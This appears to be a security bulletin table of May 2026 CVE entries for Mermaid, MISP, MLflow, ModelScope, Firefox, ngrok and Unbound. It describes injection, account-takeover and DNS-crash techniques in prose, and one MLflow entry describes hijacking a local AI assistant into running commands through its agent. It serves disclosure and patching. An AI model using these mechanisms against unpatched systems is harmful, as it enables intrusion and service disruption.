| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and prior, in addition to 11.0.0-alpha.1 through 11.12.0 are vulnerable to CSS injection through improper sanitization. The state diagram (and any other diagram type that routes user-controlled style strings through the createCssStyles parser) captures classDef values using an unrestricted regex that matches everything up to a newline. That value then flows unsanitized through addStyleClass() into createCssStyles() and is assigned to style.innerHTML, so a closing brace (}) in the value terminates the generated CSS selector and turns everything after it into a new CSS rule on the page. This enables page defacement, user tracking via url() callbacks, and DOM attribute exfiltration. This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting "securityLevel": "sandbox", which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41148 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-xcj9-5m2h-648r https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102 https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0 https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6 https://mermaid.js.org/config/schema-docs/config.html#securitylevel |
| mermaid-js--mermaid | Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Versions 10.9.5 and earlier, as well as 11.0.0-alpha.1 through 11.14.0, are vulnerable to HTML injection under the default configuration. Specifically, the classDef directive in Mermaid state diagrams permits DOM injection that escapes the SVG context. However, <script> tags are stripped, which prevents cross-site scripting (XSS). This issue has been fixed in versions 10.9.6 and 11.15.0. If developers are unable to immediately upgrade, they can work around this issue by setting "securityLevel": "sandbox", which prevents the issue by rendering the mermaid diagram in a sandboxed <iframe>. | 2026-05-22 | not yet calculated | CVE-2026-41149 | https://github.com/mermaid-js/mermaid/security/advisories/GHSA-ghcm-xqfw-q4vr https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056 https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3 |
| misp--misp | MISP's OIDC authentication plugin allowed automatic linking of an OIDC identity to an existing local user account based on the email claim when the local account had no stored sub value. Under insecure or untrusted IdP configurations where email ownership is not enforced, an attacker with a valid OIDC token could assert a victim's email address and authenticate as that user, leading to account takeover. | 2026-05-20 | not yet calculated | CVE-2026-9084 | https://github.com/MISP/MISP/commit/71f5662c1b5886613d2cd5c72fd93bb4ca6fa172 |
| misp--misp | A vulnerability was identified in the ShadowAttribute proposal creation workflow. The add action accepted user-controlled ShadowAttribute request data without removing the id field before saving the record. Because the underlying framework treats a supplied primary key as an instruction to update an existing record, an authenticated user able to submit shadow attribute proposals could provide the identifier of an existing ShadowAttribute and cause that record to be updated instead of creating a new proposal. This can result in unauthorized modification of existing shadow attributes, potentially affecting proposals associated with events the user should not be able to alter. Depending on deployment configuration and accessible API responses, the issue may also expose or move proposal data across event contexts. The vulnerability is caused by trusting a client-supplied primary key during object creation. The fix removes the id field from incoming ShadowAttribute data before processing, ensuring that the endpoint always creates a new proposal rather than updating an existing one. This has been fixed in MISP 2.5.38. | 2026-05-20 | not yet calculated | CVE-2026-9136 | https://github.com/MISP/MISP/commit/49911b1d4b6e4517d803e50e3d980aaa4d37c16d |
| misp--misp | The CSP report endpoint intended to limit logged CSP reports to 1 KB but incorrectly allowed reports up to 1 MB before truncation. On deployments where the endpoint is reachable by untrusted clients, this could allow attackers to generate excessive log volume and contribute to resource exhaustion or log flooding. | 2026-05-20 | not yet calculated | CVE-2026-9137 | https://github.com/MISP/MISP/commit/02932cccab230b295afcaf5aa05e363d30db0ec9 |
| mlflow--mlflow/mlflow | In MLflow version 3.9.0, the MLflow Assistant feature introduced improper origin validation in its /ajax-api endpoints. This vulnerability allows a remote attacker to exploit cross-origin requests from a malicious webpage to interact with the MLflow Assistant running on a victim's local machine. By bypassing the loopback-only restriction, the attacker can modify the Assistant's configuration to enable full access, which in turn allows the execution of arbitrary commands via the Claude Code sub-agent. This issue is resolved in version 3.10.0. | 2026-05-19 | not yet calculated | CVE-2026-2611 | https://huntr.com/bounties/8462addd-b464-4a84-b6a2-5529604e6e5a https://github.com/mlflow/mlflow/commit/8f9c8a53af90842944101eb8b7d60706822c81bc |
| mlflow--mlflow/mlflow | In mlflow/mlflow versions up to 3.9.0, the `SearchModelVersions` REST API endpoint and the `mlflowSearchModelVersions` GraphQL query lack proper per-model authorization checks when basic authentication is enabled. This allows any authenticated user to enumerate all model versions across all registered models, regardless of their permission level. The issue arises due to the absence of `SearchModelVersions` in the `BEFORE_REQUEST_VALIDATORS` and `AFTER_REQUEST_HANDLERS` for the REST API, and its omission from `GraphQLAuthorizationMiddleware.PROTECTED_FIELDS` for GraphQL. This vulnerability can expose sensitive information such as model names, version descriptions, source URIs, tags, and other metadata, potentially revealing proprietary or confidential details in multi-tenant environments. The issue is resolved in version 3.10.0. | 2026-05-21 | not yet calculated | CVE-2026-2734 | https://huntr.com/bounties/d632f783-b2c7-4a3b-af5e-1d693e841c08 https://github.com/mlflow/mlflow/commit/6989066af33fdcb03588fd71a1a67f8fc5ef12c9 |
| mlflow--mlflow/mlflow | In mlflow/mlflow versions prior to 3.11.0, the `get_or_create_nfs_tmp_dir()` function in `mlflow/utils/file_utils.py` creates temporary directories with world-writable permissions (0o777), and the `_create_model_downloading_tmp_dir()` function in `mlflow/pyfunc/__init__.py` creates directories with group-writable permissions (0o770). These insecure permissions allow local attackers to tamper with model artifacts, such as cloudpickle-serialized Python objects, and achieve arbitrary code execution when the tampered artifacts are deserialized via `cloudpickle.load()`. This vulnerability is particularly critical in environments with shared NFS mounts, such as Databricks, where NFS is enabled by default. The issue is a continuation of the vulnerability class addressed in CVE-2025-10279, which was only partially fixed. | 2026-05-18 | not yet calculated | CVE-2026-4137 | https://huntr.com/bounties/648dc30b-76c7-4433-86b8-f43d926fd8d6 https://github.com/mlflow/mlflow/commit/1dcbb0c2fbd1f446c328830e601ca13a28219b8a |
| ModelScope--ModelScope 1.25.0 | An issue was discovered in ModelScope 1.25.0 allowing attackers to execute arbitrary code via crafted module listed in the configuration file (dey_mini.yaml) under the key ['nnet']['module']. | 2026-05-19 | not yet calculated | CVE-2025-51427 | https://github.com/modelscope/modelscope/issues/1331 https://github.com/modelscope/modelscope/pull/1333 https://github.com/JIRUWOZHI/vulnerability-disclosure/blob/main/CVE-2025-51427/CVE_2025_51427.md |
| Mozilla--Firefox | Sandbox escape in Firefox and Firefox Focus for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8945 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003171 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8946 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029070 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8947 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038439 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8948 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038803 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Integer overflow in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8949 | https://bugzilla.mozilla.org/show_bug.cgi?id=1355639 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the Networking: HTTP component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8950 | https://bugzilla.mozilla.org/show_bug.cgi?id=1965430 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8951 | https://bugzilla.mozilla.org/show_bug.cgi?id=2018513 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla--Firefox | Privilege escalation in the Application Update component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8952 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021727 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Sandbox escape due to use-after-free in the Disability Access APIs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8953 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029511 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Incorrect boundary conditions, integer overflow in the Audio/Video component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8954 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030747 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Privilege escalation in the DOM: Workers component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8955 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031064 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8956 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032427 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8957 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033850 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Information disclosure, sandbox escape in the Security: Process Sandboxing component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8958 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034713 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8959 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034754 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in WebExtensions. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8960 | https://bugzilla.mozilla.org/show_bug.cgi?id=1940116 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Spoofing issue in the Form Autofill component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8961 | https://bugzilla.mozilla.org/show_bug.cgi?id=1962625 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8962 | https://bugzilla.mozilla.org/show_bug.cgi?id=2004804 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8963 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021222 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Spoofing issue in the Popup Blocker component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8964 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025170 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8965 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025740 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the IP Protection component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8966 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025849 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8967 | https://bugzilla.mozilla.org/show_bug.cgi?id=2027173 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Denial-of-service due to invalid pointer in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8968 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030467 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8969 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031123 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Privilege escalation in the Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8970 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032174 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the Networking: JAR component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8971 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032604 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8972 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033275 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8973 | Memory safety bugs fixed in Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8974 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8975 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox for iOS | Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0. | 2026-05-19 | not yet calculated | CVE-2026-8706 | https://bugzilla.mozilla.org/show_bug.cgi?id=2036618 https://www.mozilla.org/security/advisories/mfsa2026-49/ |
| ngrok--ngrok v4.3.3 and 5.0.0-beta.2 | ngrok v4.3.3 and 5.0.0-beta.2 are vulnerable to Command Injection. | 2026-05-18 | not yet calculated | CVE-2025-57282 | https://www.npmjs.com https://gist.github.com/Dremig/90c2a0a2f85b0921f10e0bb3192a0c23 |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support ('--enable-dnscrypt'). A bad DNSCrypt query could underflow Unbound's DNSCrypt packet reading procedure, which may lead to a heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query whose decrypted plaintext consists entirely of '0x00' bytes and does not contain the expected '0x80' marker. Unbound would then start reading more bytes than necessary until it finds a non-'0x00' byte. Based on the underlying memory allocator and the memory layout, it could lead to a heap overflow while reading, followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound's later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space. | 2026-05-20 | not yet calculated | CVE-2026-32792 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.19.1 up to and including version 1.25.0 has a vulnerability in the DNSSEC validator that enables denial of service and possible remote code execution as a result of deep copying a data structure and erroneously overwriting a destination pointer. An adversary can exploit the vulnerability by controlling a malicious signed zone and querying a vulnerable Unbound. When DS sub-queries need to suspend validation due to NSEC3 computational budget exhaustion (introduced in Unbound 1.19.1), Unbound deep-copies response messages to preserve them across memory region teardown. A struct-assignment bug overwrites the destination's pointer with the source's pointer. After the sub-query region is freed, the resumed validator dereferences this dangling pointer, triggering a crash or potentially enabling arbitrary code execution. Unbound 1.25.1 contains a patch with a fix to preserve the correct pointer when deep copying the data structure. | 2026-05-20 | not yet calculated | CVE-2026-33278 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-33278.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.16.2 up to and including version 1.25.0 has a vulnerability of the 'ghost domain names' family of attacks that could extend the ghost domain window by up to one cached TTL configured value. Similar to other 'ghost domain names' attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client NS query can cause Unbound to overwrite the cached expired parent-side referral NS rrset with the child-side apex NS rrset and essentially extend the ghost domain window by up to one cached TTL configured value ('cache-max-ttl'). In configurations where 'harden-referral-path: yes' is used (non-default configuration), no client NS query is required since Unbound implicitly performs that query. Unbound 1.25.1 contains a patch with a fix that does not allow extension of TTLs for (parent) NS records regardless of their trust. | 2026-05-20 | not yet calculated | CVE-2026-40622 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-40622.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100). | 2026-05-20 | not yet calculated | CVE-2026-41292 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the jostle logic that could defeat its purpose and degrade resolution performance. Retransmits of the same query could renew the age of slow running queries and not allow the jostle logic to see them as aged and potential targets for replacement with new queries. An adversary who can query a vulnerable Unbound and who can control a domain name server that replies slowly and/or maliciously to Unbound's queries can exploit the vulnerability and degrade the resolution performance of Unbound. When Unbound's 'num-queries-per-thread' reaches its limit, the jostle logic kicks in. When a new query comes in, half of the available queries that are also slow to resolve are candidates for replacement. The vulnerability then happens because duplicate queries that need resolution would skew the aging result by using the timestamp of the latest duplicate query instead of the original one that started the resolution effort. Cache and local data response performance remains unaffected. Coordinated attacks could raise this to a denial of resolution service. Unbound 1.25.1 contains a patch with a fix to attach an initial, non-updatable start time for incoming queries that allows the jostle logic to work as intended. | 2026-05-20 | not yet calculated | CVE-2026-42534 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42534.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations. | 2026-05-20 | not yet calculated | CVE-2026-42923 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a vulnerability that results in heap overflow when encoding multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options in the reply packet. The relevant options ('nsid', 'answer-cookie', 'pad-responses' (default)) need to be enabled for the vulnerability to be exploited. An adversary who can query Unbound can exploit the vulnerability by attaching multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options to the query. A flaw in the size calculation of the EDNS field truncates the correct value which allows the encoder to overflow the available space when writing. Those two combined lead to a heap overflow write of Unbound controlled data and eventually a crash. Unbound 1.25.1 contains a patch with a fix to de-duplicate the EDNS options and a fix to prevent truncation of the EDNS field size calculation. | 2026-05-20 | not yet calculated | CVE-2026-42944 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42944.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a denial of service vulnerability in the DNSSEC validator that can lead to a crash given malicious upstream replies. When Unbound constructs chase-reply messages for validation, the code uses the wrong counter to calculate write offsets for ADDITIONAL section rrsets. DNAME duplication could increase the ANSWER section count and authority filtering could decrease the AUTHORITY section count and create an uninitialized array slot. Combining these two, the validator later dereferences this uninitialized pointer, causing an immediate process crash. An adversary controlling a DNSSEC-signed domain can trigger this bug with a single query by configuring a DNAME chain with unsigned CNAMEs and a response containing unsigned AUTHORITY records alongside signed ADDITIONAL glue records. Unbound 1.25.1 contains a patch with a fix to use the proper counters to calculate the write offsets. | 2026-05-20 | not yet calculated | CVE-2026-42959 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42959.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound into caching such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack), they would be able to poison Unbound's cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the related address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411. | 2026-05-20 | not yet calculated | CVE-2026-42960 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability when handling replies with very large RRsets that Unbound needs to perform name compression for. Malicious upstream responses with very large RRsets with records that don't share a suffix above the root can cause Unbound to spend a considerable time applying name compression to downstream replies. This can lead to degraded performance and eventually denial of service in well orchestrated attacks. An adversary can exploit the vulnerability by querying Unbound for the specially crafted contents of a malicious zone with very large RRsets. Before Unbound replies to the query it will try to apply name compression, which was an unbounded operation that could lock the CPU until the whole packet was complete. A compression limit was introduced in 1.21.1 for this, but it didn't account for the case where records would not share any suffix above the root. That causes Unbound to go down a different code path because of the compression tree lookup failure and eventually not increment the compression counter for those operations. Unbound 1.25.1 contains a patch with a fix that increments the compression counter regardless of the compression tree lookup. This is a complement fix to CVE-2024-8508. | 2026-05-20 | not yet calculated | CVE-2026-44390 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44390.txt |
